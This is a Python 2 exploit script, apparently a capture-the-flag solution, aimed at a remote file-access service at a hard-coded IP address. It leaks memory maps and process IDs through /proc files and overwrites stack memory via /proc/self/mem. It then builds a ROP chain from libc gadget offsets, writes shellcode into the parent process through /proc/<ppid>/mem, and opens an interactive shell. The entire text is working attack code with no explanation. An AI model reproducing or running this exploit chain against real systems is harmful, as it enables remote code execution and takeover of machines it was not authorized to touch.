import sys
import phun

def sendit(r,fn,seek=0,cnt=0,end=False,has_epi=True):
    r.read('?\n')
    r.sendline('r')
    r.read('?\n')
    r.sendline(fn)
    r.read('?\n')
    r.sendline(str(seek))
    r.read('?\n')
    r.sendline(str(cnt) if type(cnt) == int else cnt)
    if has_epi:
        r.read('bytes\n')
        ret= r.read('quit')
        r.sendline('y' if end else 'n')
        return ret

    
local = sys.argv[1] == '-l'
if local:
    r = phun.Remote('localhost',1234)
    FD = 5
    hook_off = 0x398ad0
    rop0_off = 0x36a74
    off_pop_rdx_rsi = 0xf5009
    off_pop_r8 = 0x112476
    off_pop_r14 = 0x1fbc9
    off_pop_rax = 0x36018
    off_pop_rcx = 0x2d753
    off_pop_rbx = 0x29179
    off_movr14_callebx = 0x21092

else:
    r = phun.Remote('104.155.105.0',14000)
    FD = 3
    hook_off = 0x3bdaf0
    rop0_off = 0x3aa94 
    off_pop_rdx_rsi = 0x1115b9
    off_pop_r8 = 0x131c06
    off_pop_r14 = 0x229a4
    off_pop_rax = 0x1d5f8
    off_pop_rcx = 0x1a5298
    off_pop_rbx = 0x2a369
    off_movr14_callebx = 0x2172a

## get me some maps
maps = sendit(r,'/proc/self/maps',cnt=9086)
base = libc = heap = stack = ostack = None
#print maps
for line in maps.split("\n"):
    if '/libc' in line and not libc:
        libc = int(line.split('-')[0],16)
    elif '/chal' in line and not base:
        base = int(line.split('-')[0],16)
    elif '/tea' in line and not base:
        base = int(line.split('-')[0],16)
    elif '[heap]' in line and not heap:
        heap = int(line.split('-')[0],16)
    elif line.startswith('6f') and not stack:
        stack = int(line.split('-')[0],16)
    elif '0-3' in line and not stack:
        stack = int(line.split('-')[0],16)

    elif '[stack]' in line and not ostack:
        ostack = int(line.split('-')[0],16)
        

print '[+] base',hex(base)
print '[+] heap',hex(heap)
print '[+] libc',hex(libc)
print '[+] stack',hex(stack)

data=sendit(r,'/proc/self/stat',cnt=32)
data=data.split(' ')
pid = int(data[0])
ppid = int(data[3])
print '[*] pid: %d ppid: %d' % (pid,ppid) 
a = ostack + 0x1f000
data = sendit(r,'/proc/self/mem',seek=a,cnt=0x4000)
off=data.index(phun.p64(stack))
offset = phun.u64(data[off-0x20:off-0x20+8])
print '[+] random offset',hex(offset)
stack_var  = stack+offset-0x1000+4032
print '[+] stack_var',hex(stack_var)


malloc_hook = libc +  hook_off
rop_begin = libc + rop0_off

payload = ('9'.ljust(16,"\x00") + phun.p64(rop_begin)).ljust(0x30)
payload += phun.p64(FD,malloc_hook)
sendit(r,'/proc/self/mem',seek=stack_var,cnt=payload)

sh = phun.sh('x64')
rop = phun.p64(*[
    base + 0x24a3, 0xffFFffFF << 32 | 2,base + 0xaa0,
    base + 0x24a3, 0xffFFffFF << 32 | 3,base + 0xaa0,
    base + 0x24a3, stack_var + 0x100,
    libc + off_pop_rdx_rsi, 0, 2,
    base + 0xaf8,
    base + 0x24a3, 2,
    libc + off_pop_rdx_rsi, 0, base + 0xa60,
    base + 0xa98,
    base + 0x24a3, 2,
    libc + off_pop_rdx_rsi, len(sh), stack_var + 0x110,
    base + 0xA78,
    base + 0x1E4D 
]).ljust(0x100,"\x90") + ('/proc/%d/mem' % ppid).ljust(16,"\x00") + sh

fname = ('/proc/%d/mem'%ppid).ljust(52,"\x00") + phun.p64(2)
payload = "128\x00" + "A"*12 + rop #mmap_rop()
sendit(r,fname,seek=libc,cnt=payload,has_epi=False)
r.shell()